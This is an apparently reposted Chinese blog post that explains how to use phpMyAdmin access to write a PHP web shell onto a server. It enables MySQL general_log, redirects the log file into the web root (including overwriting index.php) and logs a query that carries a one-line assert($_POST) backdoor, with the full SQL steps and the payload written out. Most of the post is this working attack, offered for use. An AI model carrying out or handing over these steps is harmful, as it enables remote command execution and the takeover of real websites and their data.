phpmyadmin漏洞利用general_log和general_log_file拿權限


我們如果知道phpmyadmin和網站的絕對路徑后,可以利用into outfile寫馬拿到權限,但是吧有新版本的mysql和一些系統設置的問題這個函數受到了secure-file-priv這個的影響而且在linux上邊必須有寫 W的權限。。。這個得配置系統文件,在沒有拿到權限的時候沒法弄。。。 

可以利用general_loggeneral_log_file

#原理:
開啟general_log后,系統將mysql以后執行的每一條查詢語句寫入你指定的位置的文件里。而文件的位置則由general_log_file確定。我們可以開啟這個選項后,SELECT '<?php assert($_POST["cmd"]);?>';,這個指令就把木馬插入到你指定的php文件中去了。  

#操作:
show variables like 'general%';
一般為OFF,我們可以在phpmyadmin上邊執行操作:  
set global general_log = "ON"; 
SET global general_log_file="C:\softeware\phpstudy\PHPTutorial\WWW\shell.php"    
(SET global general_log_file="/var/www/html/index.php")

開啟:

https://images2018.cnblogs.com/blog/1397720/201807/1397720-20180723154154444-1800467525.png

設置路徑:

https://images2018.cnblogs.com/blog/1397720/201807/1397720-20180723154210865-386750088.png

查詢一句話木馬:

查看木馬:


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM